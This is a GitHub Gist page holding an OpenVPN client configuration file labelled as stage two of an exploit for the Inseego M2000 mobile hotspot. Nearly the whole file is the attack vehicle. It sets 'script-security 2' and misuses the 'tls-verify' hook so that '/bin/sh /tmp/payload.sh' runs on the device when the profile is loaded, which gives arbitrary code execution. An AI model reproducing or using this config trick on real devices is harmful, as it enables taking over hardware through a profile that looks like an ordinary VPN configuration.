Last active
May 6, 2025 22:15
-
-
Save Geofferey/722b8aec66b3ecaaa38b6773872e13c2 to your computer and use it in GitHub Desktop.
inseego_m2000-stage2-exploit.ovpn
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
client | |
dev tun | |
persist-tun | |
persist-key | |
ncp-ciphers AES-128-GCM:AES-256-GCM | |
cipher AES-128-GCM | |
auth SHA1 | |
tls-client | |
resolv-retry infinite | |
remote some-server.internal 1196 | |
proto udp4 | |
keepalive 60 120 | |
float | |
nobind | |
auth-user-pass | |
auth-retry nointeract | |
remote-cert-tls server | |
explicit-exit-notify | |
script-security 2 | |
tls-verify "/bin/sh /tmp/payload.sh" | |
<ca> | |
-----BEGIN CERTIFICATE----- | |
........................... | |
-----END CERTIFICATE------- | |
</ca> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment